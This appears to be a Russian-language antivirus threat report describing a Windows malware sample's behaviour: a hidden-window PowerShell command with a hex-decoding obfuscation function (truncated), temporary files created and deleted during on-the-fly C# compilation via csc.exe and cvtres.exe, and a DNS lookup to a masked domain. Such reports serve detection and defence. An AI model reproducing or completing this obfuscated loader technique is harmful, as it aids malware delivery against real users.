Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function pbf1638 {param($r9c5a6)$p69693b='gdc1564';$u3446='';for ($i=0; $i -lt $r9c5a6.length;$i+=2){$d78e2e=[convert]::ToByte($r9c5a6.Substring($i,2),16);$u3446+=[char]($...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\03ejnofi.0.cs
- %TEMP%\03ejnofi.cmdline
- %TEMP%\03ejnofi.out
- %TEMP%\cscf92c.tmp
- %TEMP%\resf93c.tmp
- %TEMP%\03ejnofi.dll
Удаляет следующие файлы
- %TEMP%\resf93c.tmp
- %TEMP%\cscf92c.tmp
- %TEMP%\03ejnofi.dll
- %TEMP%\03ejnofi.cmdline
- %TEMP%\03ejnofi.pdb
- %TEMP%\03ejnofi.out
- %TEMP%\03ejnofi.0.cs
Сетевая активность
UDP
- DNS ASK fb###v.website
Другое
Создает и запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\03ejnofi.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF93C.tmp" "%TEMP%\CSCF92C.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\03ejnofi.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF93C.tmp" "%TEMP%\CSCF92C.tmp"
